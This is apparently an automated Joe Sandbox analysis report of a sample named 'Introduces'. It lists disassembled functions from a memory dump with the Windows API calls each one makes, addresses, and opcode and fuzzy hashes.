WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00A5ECF7

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 76cf9d638c353e7d8af96591c6b1dd4ce65aee6d3d33a00fd57ed4de931093f3
Instruction ID: 924f68e61b7710cd6efac2a7af0ceec5e8056acc5bf2b0cb6e571b3eb5a250f6
Opcode Fuzzy Hash: 76cf9d638c353e7d8af96591c6b1dd4ce65aee6d3d33a00fd57ed4de931093f3
Instruction Fuzzy Hash: C0511535A00109DFCB05EF64C985EAEBBF5EF48314B188099E909AB3A2DB31ED55DF50

Function 00A7A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f543070fe649f64b194ec7fc464c5a5ff903b3ff9730b8abb9d557bf5c37d5d
Instruction ID: 8e28285867a5297c1d3041e05cc3d829d35730569b6c47425f11a47cede29b6b
Opcode Fuzzy Hash: 4f543070fe649f64b194ec7fc464c5a5ff903b3ff9730b8abb9d557bf5c37d5d
Instruction Fuzzy Hash: 0D41D236900104BFD718DB68CC84FAEBBB8EB99310F14C165E91EE72E1D7709D41DA51

Function 009F2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009F2727
ScreenToClient.USER32(00AB77B0,?), ref: 009F2744
GetAsyncKeyState.USER32(00000001), ref: 009F2769
GetAsyncKeyState.USER32(00000002), ref: 009F2777

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 8b1b703fc7c804f266ea246130ae2e7ae43281a10704b99b60de78de253c5431
Instruction ID: 2bc40bd3e1c48fe4390a421fdd832be176de1347f2ce7860a1515a4f7d150330
Opcode Fuzzy Hash: 8b1b703fc7c804f266ea246130ae2e7ae43281a10704b99b60de78de253c5431
Instruction Fuzzy Hash: B7414D75604119FBDF19EFA8C844BEDBB74BB05374F20836AF928A6290C730AD54DB91

Function 00A495D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00A495E8
PostMessageW.USER32(?,00000201,00000001), ref: 00A49692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00A4969A
PostMessageW.USER32(?,00000202,00000000), ref: 00A496A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00A496B0

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 333d62323e1155016d0468e50150d8117b140af3f3513caf1136f15993fb2897
Instruction ID: 15fc693d576d156c26eabf3013a488ebac0a703d3d9af6c174f4c52b17314271
Opcode Fuzzy Hash: 333d62323e1155016d0468e50150d8117b140af3f3513caf1136f15993fb2897
Instruction Fuzzy Hash: FE31CC75900219EFDB14CFA8D94DA9FBBB5FB84325F114229F924AB2D0C3B09924DB90

Function 00A4BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00A4BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00A4BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00A4BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00A4BE18
_wcsstr.LIBCMT ref: 00A4BE22

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: e1c6088c8193c9c7ba1bdae3893b8326a9820b45ef9ec5ebb00712158bd89c74
Instruction ID: 62c5bdd96add9135f468d79afc7b8834f4d4250a67d61b3c85e79afa71420d5b
Opcode Fuzzy Hash: e1c6088c8193c9c7ba1bdae3893b8326a9820b45ef9ec5ebb00712158bd89c74
Instruction Fuzzy Hash: 03212936608204BFEB259B759C0AEBB7BACDFC8760F104079F909CA191EB61CC519370

Function 00A7B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 009F29E2: GetWindowLongW.USER32(?,000000EB), ref: 009F29F3

GetWindowLongW.USER32(?,000000F0), ref: 00A7B804
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00A7B829
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00A7B841
GetSystemMetrics.USER32(00000004), ref: 00A7B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A6155C,00000000), ref: 00A7B888

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 9b5f9da34b638f0f67e9af4313fd26e8ef8be8146487bcddc2bb90c19ebe67d4
Instruction ID: c8589a36e3c1642dcd24577fa65ecf7e657f591de027041b21c29babcb41ce4b
Opcode Fuzzy Hash: 9b5f9da34b638f0f67e9af4313fd26e8ef8be8146487bcddc2bb90c19ebe67d4
Instruction Fuzzy Hash: 0821A6B1924215AFCB149F78CC04B6937A8FB45321F10C739F929D75E0D7708851DBA0

Function 00A49EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A49ED8

Part of subcall function 00A01821: _memmove.LIBCMT ref: 00A0185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A49F0A
__itow.LIBCMT ref: 00A49F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A49F4A
__itow.LIBCMT ref: 00A49F5B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 136efe40c171cdbcbfee2e0e88806d6427cb34a15438b8624fd6dfd61ba1b5e0
Instruction ID: 6d15e06d2c6898396388d6b4961180f7a8ead99308d9f8d41d705de7bbad67d2
Opcode Fuzzy Hash: 136efe40c171cdbcbfee2e0e88806d6427cb34a15438b8624fd6dfd61ba1b5e0
Instruction Fuzzy Hash: 3721A135600208BBDB10EBA4998AEEF7BA8EFD9750F044025F901DB281E770C9699792

Function 00A66138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00A66159
GetForegroundWindow.USER32 ref: 00A66170
GetDC.USER32(00000000), ref: 00A661AC
GetPixel.GDI32(00000000,?,00000003), ref: 00A661B8
ReleaseDC.USER32(00000000,00000003), ref: 00A661F3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 7abcaa284af438f7d4fd1866b1a3ca90294472c0599a50489c710209768a9158
Instruction ID: 0afb623af21f2c82d9a7a36df7085843ff7e2d186ffadcca10bd408023058868
Opcode Fuzzy Hash: 7abcaa284af438f7d4fd1866b1a3ca90294472c0599a50489c710209768a9158
Instruction Fuzzy Hash: BD21A475A006049FD700EFA5DD84EAABBF5EF88311F048479E94A97252DA74AC05CB90

Function 009F16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 009F1729
SelectObject.GDI32(?,00000000), ref: 009F1738
BeginPath.GDI32(?), ref: 009F174F
SelectObject.GDI32(?,00000000), ref: 009F1778

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 36f5996585360c133a04af56bad8c2ccc1aa2942387b7acf4b26675d4629f986
Instruction ID: b142c5fcfa71ae8b6b0a690a743199b311c1f492840afa92f3aa1f2d5b2f4fb2
Opcode Fuzzy Hash: 36f5996585360c133a04af56bad8c2ccc1aa2942387b7acf4b26675d4629f986
Instruction Fuzzy Hash: B5219D30804208EBDB11EFE4EC48B6D7BB8AB40321F144316F919A61B2D7B498D6CB90

Function 00A4C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00A4C84C
_memcmp.LIBCMT ref: 00A4C86A
_memcmp.LIBCMT ref: 00A4C87D
_memcmp.LIBCMT ref: 00A4C895
_memcmp.LIBCMT ref: 00A4C8AD

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 26bc26775cd30de236680972fcc86e62ccad6cc6639ca5166a699ac58d71cc7d
Instruction ID: 28f2731f86bcd06995c4edb7788c10378d179f6e7dc310d4e9220e0858d93ced
Opcode Fuzzy Hash: 26bc26775cd30de236680972fcc86e62ccad6cc6639ca5166a699ac58d71cc7d
Instruction Fuzzy Hash: 7C01F5B7B021057BD61067109E82FFB732CAAA07A4F044435FE1A96342F7A1DE1582E4

Function 00A5504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A55075
__beginthreadex.LIBCMT ref: 00A55093
MessageBoxW.USER32(?,?,?,?), ref: 00A550A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00A550BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00A550C5

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: bd747d917447b6b6a62a7e23bfb3c29f4f6e8347a9cf764cf8c1837eecddbce0
Instruction ID: b8257e290aca473c8b038a40523badd2a9e013943272fd883d2d8e9a1505ee80
Opcode Fuzzy Hash: bd747d917447b6b6a62a7e23bfb3c29f4f6e8347a9cf764cf8c1837eecddbce0
Instruction Fuzzy Hash: FE11C276D08608AFC741DBE89C18ADF7BA8AB85321F140365F814D33A1D6B2894987E0

Function 00A48E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A48E3C
GetLastError.KERNEL32(?,00A48900,?,?,?), ref: 00A48E46
GetProcessHeap.KERNEL32(00000008,?,?,00A48900,?,?,?), ref: 00A48E55
HeapAlloc.KERNEL32(00000000,?,00A48900,?,?,?), ref: 00A48E5C
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A48E73

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 0ca9c1e6772015655fffca0b55c0f4e7fe7a10bc0016fed5c74671045205b0e3
Instruction ID: d35e379c21a2bfbd5d5a87aeb9314e0200a84349d7f2c8db8fa5636ad81ae2c8
Opcode Fuzzy Hash: 0ca9c1e6772015655fffca0b55c0f4e7fe7a10bc0016fed5c74671045205b0e3
Instruction Fuzzy Hash: A801FB75601204AFDB209FE5EC89D6B7FADEF89765B100569F889C3220DA71DC15CB70

Function 00A557FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A5581B
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A55829
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A55831
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00A5583B
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A55877

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 799baec73c62c1125567f681192bbc564eeea05500bbe4c2e05759ac4d2c38fa
Instruction ID: 16c352be3e82eb1c12e1656e361fe3ea31842124cd485206f7bc3ed2dc26afa3
Opcode Fuzzy Hash: 799baec73c62c1125567f681192bbc564eeea05500bbe4c2e05759ac4d2c38fa
Instruction Fuzzy Hash: EC015731D11A299BCF00DFF9E899AEDBBB8BB08712F004156E901B2140DB319558DBA1

Function 00A47D28 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A47C62,80070057,?,?,?,00A48073), ref: 00A47D45
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A47C62,80070057,?,?), ref: 00A47D60
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A47C62,80070057,?,?), ref: 00A47D6E
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A47C62,80070057,?), ref: 00A47D7E
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00A47C62,80070057,?,?), ref: 00A47D8A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 9d3ac9da540fbe0c4562c8d8296fe3a4b3b55fce6f6dbe9227fe8c4fae481e7d
Instruction ID: 5cc1114ed6c988d7bd0e5315151094c7349475e04e3306e484c8c28780d1001b
Opcode Fuzzy Hash: 9d3ac9da540fbe0c4562c8d8296fe3a4b3b55fce6f6dbe9227fe8c4fae481e7d
Instruction Fuzzy Hash: 6F017CBAA15214ABDB118F98DD44FAE7BADEF84752F154024F908D6210E771ED41CBA0

Function 00A48CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00A48CDE
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00A48CE8
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00A48CF7
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00A48CFE
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00A48D14

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3ce81675064be78feaf2eb94996695df9edf2319c1fab530f11debe8c47350c6
Instruction ID: 120a33e2fb0bff69d5f1e7ac337f8fcb370ed09246daf2281008c0a3cde21ac0
Opcode Fuzzy Hash: 3ce81675064be78feaf2eb94996695df9edf2319c1fab530f11debe8c47350c6
Instruction Fuzzy Hash: D3F0AF35201304AFEB504FE4ACCCE6B3BACEF89754B104125F904C6190DA609C06DB60

Function 00A48D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00A48D3F
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D49
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D58
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D5F
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00A48D75

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3c6fc055985b19f21a00b4a3e85c7b4581f25ffed2cd241ab6b22d8c60d4eca0
Instruction ID: 1157d511f8cf06809d7da2775f9c01d40763ae6bc4c76cfa59db1d554ac436ca
Opcode Fuzzy Hash: 3c6fc055985b19f21a00b4a3e85c7b4581f25ffed2cd241ab6b22d8c60d4eca0
Instruction Fuzzy Hash: E7F0A935201304AFEB614FA4EC88F6B3BACEF89764F040229F954C6190DB609D0AEB60

Function 00A4CD7C Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00A4CD90
GetWindowTextW.USER32(00000000,?,00000100), ref: 00A4CDA7
MessageBeep.USER32(00000000), ref: 00A4CDBF
KillTimer.USER32(?,0000040A), ref: 00A4CDDB
EndDialog.USER32(?,00000001), ref: 00A4CDF5

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 3b15fd83e6596115dd963ed91531daba7e9b3868e10a1604d97276bcf2c87518
Instruction ID: 54acfa5b6b1ce0a26ee288f08f5b1fbd718c3a476ec345837cbd2d402814b500
Opcode Fuzzy Hash: 3b15fd83e6596115dd963ed91531daba7e9b3868e10a1604d97276bcf2c87518
Instruction Fuzzy Hash: C801A934901708ABEB619B60DD4EFA67B78FF40715F000679F586A10E1DBF4A9598B80

Function 009F178C Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 009F179B
